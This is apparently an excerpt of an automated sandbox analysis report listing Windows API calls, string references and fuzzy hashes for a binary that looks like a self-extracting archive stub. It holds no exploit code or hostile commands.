                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00BB3D44,00000800), ref: 00B90CD8
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • _swprintf.LIBCMT ref: 00B90D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00B90D96
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00B90D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00B90DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00B90DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00B90DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B90DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00B90DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00B90DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00B90DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00B90DF5
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                    • API String ID: 1207345701-3298887752

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B9C744
                                                                                                                      • Part of subcall function 00B9B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B9B3FB
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B9CA71
                                                                                                                    • _wcslen.LIBCMT ref: 00B9CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00B9CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00B9CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B9CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00BCA472), ref: 00B9CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B9CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                    • Opcode ID: d840eeb65f1a323a9a9c2b05260c337c2864b01a24dd6db170b27e74400202c9
                                                                                                                    • Instruction ID: a337deefa0aef6b9f110dd0cc527c4e0734d2d5d129cdd3d12bdfd7ff5d3f464
                                                                                                                    • Opcode Fuzzy Hash: d840eeb65f1a323a9a9c2b05260c337c2864b01a24dd6db170b27e74400202c9
                                                                                                                    • Instruction Fuzzy Hash: F9E14DB2904219AADF25EBA0DC85EEE77FCEB05710F5041F6F609E7051EF749A848B60
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B8DA70
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B8DAAC
                                                                                                                      • Part of subcall function 00B8C29A: _wcslen.LIBCMT ref: 00B8C2A2
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8BAE9,00000000,?,?,?,0001040E), ref: 00B91BA0
                                                                                                                    • _wcslen.LIBCMT ref: 00B8DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 00B8DF1C
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                    • Opcode ID: 4c9b3a0a88c1fbdd2f086fc4df329d73353bda54a2d53b94cd856ccc53f8d266
                                                                                                                    • Instruction ID: efe5dd3b721924e8c6db0b034b3fa6a04fb7745d7c44b0dffbaf7b32d4027431
                                                                                                                    • Opcode Fuzzy Hash: 4c9b3a0a88c1fbdd2f086fc4df329d73353bda54a2d53b94cd856ccc53f8d266
                                                                                                                    • Instruction Fuzzy Hash: 9832B071900218EBCF24FF68C886AEA77E5FF15700F4405AAF915A72A1EBB1DD85CB50

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,00BDFCB8), ref: 00B9D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00B9AF07,00000001,?,?,00B9B7B9,00BB506C,00BDFCB8,00BDFCB8,00001000,00000000,00000000), ref: 00B9D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB35F4), ref: 00B9D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00BB43F4), ref: 00B9D5F0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                    • Opcode ID: f38f2d7eeaa820aa20323fa539bef4b71eb19dbdf65b576e931ac80f6531298b
                                                                                                                    • Instruction ID: 2e971f224c5ffdf1bbbcc3c575dca39a25d67992f41853b01eeb787a834cb3c1
                                                                                                                    • Opcode Fuzzy Hash: f38f2d7eeaa820aa20323fa539bef4b71eb19dbdf65b576e931ac80f6531298b
                                                                                                                    • Instruction Fuzzy Hash: 8E31AF71145382ABE301DF209C8EFAB7FECEB96B04F000518F5519B2A2DF669A048776

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B9D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00B9D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00B9D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00B9D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B9D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00B9D9E1
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf
                                                                                                                    • API String ID: 36480843-3750412487
                                                                                                                    • Opcode ID: 5798a1eb048289096ed3f735d1e2f4b7cd57e42200808f0d2674c2ac1ec4337b
                                                                                                                    • Instruction ID: 65d3563aea651f63657e67d28a881390ed3274297bf738b5f7462b16ef59be2a
                                                                                                                    • Opcode Fuzzy Hash: 5798a1eb048289096ed3f735d1e2f4b7cd57e42200808f0d2674c2ac1ec4337b
                                                                                                                    • Instruction Fuzzy Hash: C951C7715083809ADF31AF26D894BBBBBE4EF45744F0408BEF5C5971A1EBB18984C762

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BA5695,00BA5695,?,?,?,00BAABAC,00000001,00000001,2DE85006), ref: 00BAA9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BAABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BAAA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BAAB35
                                                                                                                    • __freea.LIBCMT ref: 00BAAB42
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • __freea.LIBCMT ref: 00BAAB4B
                                                                                                                    • __freea.LIBCMT ref: 00BAAB70
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0

                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00BA3C35,?,?,00BE2088,00000000,?,00BA3D60,00000004,InitializeCriticalSectionEx,00BB6394,InitializeCriticalSectionEx,00000000), ref: 00BA3C03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818

                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B87760,?,00000005,?,00000011), ref: 00B8995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B8996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B87760,?,00000005,?), ref: 00B899A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B899AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B87760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B899F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0

                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                    • IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0

                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00B9ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B9ABF9
                                                                                                                      • Part of subcall function 00B91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B8C116,00000000,.exe,?,?,00000800,?,?,?,00B98E3C), ref: 00B91FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B9ABE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518


                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00B9AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9AC66
                                                                                                                    • SHGetMalloc.SHELL32(00BC8438), ref: 00B9AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll
                                                                                                                    • API String ID: 3498096277-3360196438

                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439

                                                                                                                    Control-flow Graph (function at b89785; graph not reproduced)
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00B89795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B897AD
                                                                                                                    • GetLastError.KERNEL32 ref: 00B897DF
                                                                                                                    • GetLastError.KERNEL32 ref: 00B897FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B8D710,00000000,00000000,?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue), ref: 00BAAD66
                                                                                                                    • GetLastError.KERNEL32(?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue,00BB7970,FlsSetValue,00000000,00000364,?,00BA98B7), ref: 00BAAD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BAACDB,00B8D710,00000000,00000000,00000000,?,00BAAED8,00000006,FlsSetValue,00BB7970,FlsSetValue,00000000), ref: 00BAAD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B8D343,00000001,?,?,?,00000000,00B9551D,?,?,?), ref: 00B89F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B9551D,?,?,?,?,?,00B94FC7,?), ref: 00B89FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B8D343,00000001,?,?), ref: 00B8A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8C27E: _wcslen.LIBCMT ref: 00B8C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BAB8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BAAFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BAA56F), ref: 00BAAF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BABA44,?), ref: 00BAB7E6
                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BABA89,?,00000000), ref: 00BABC64
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00BABA89,?,?,?,00BABA89,?,00000000), ref: 00BABC77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 546120528-0
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B89A50,?,?,00000000,?,?,00B88CBC,?), ref: 00B89BAB
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00B88411,-00009570,00000000,000007F3), ref: 00B89BB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00BA97E5: GetLastError.KERNEL32(?,00BC1030,00BA4674,00BC1030,?,?,00BA3F73,00000050,?,00BC1030,00000200), ref: 00BA97E9
                                                                                                                      • Part of subcall function 00BA97E5: _free.LIBCMT ref: 00BA981C
                                                                                                                      • Part of subcall function 00BA97E5: SetLastError.KERNEL32(00000000,?,00BC1030,00000200), ref: 00BA985D
                                                                                                                      • Part of subcall function 00BA97E5: _abort.LIBCMT ref: 00BA9863
                                                                                                                      • Part of subcall function 00BABB4E: _abort.LIBCMT ref: 00BABB80
                                                                                                                      • Part of subcall function 00BABB4E: _free.LIBCMT ref: 00BABBB4
                                                                                                                      • Part of subcall function 00BAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BABA44,?), ref: 00BAB7E6
                                                                                                                    • _free.LIBCMT ref: 00BABA9F
                                                                                                                    • _free.LIBCMT ref: 00BABAD5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991157371-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B81E55
                                                                                                                      • Part of subcall function 00B83BBA: __EH_prolog.LIBCMT ref: 00B83BBF
                                                                                                                    • _wcslen.LIBCMT ref: 00B81EFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2838827086-0
                                                                                                                    APIs
                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B873BC,?,?,?,00000000), ref: 00B89DBC
                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1392018926-0
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B89F27,?,?,00B8771A), ref: 00B896E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B89F27,?,?,00B8771A), ref: 00B89716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B89EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00B89ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA8E75
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BC1098,00B817CE,?,?,00000007,?,?,?,00B813D6,?,00000000), ref: 00BA8EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00B910AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B910B2
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641,000000FF), ref: 00B8A1F1
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641), ref: 00B8A21F
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00BB2641,000000FF), ref: 00B9ACB0
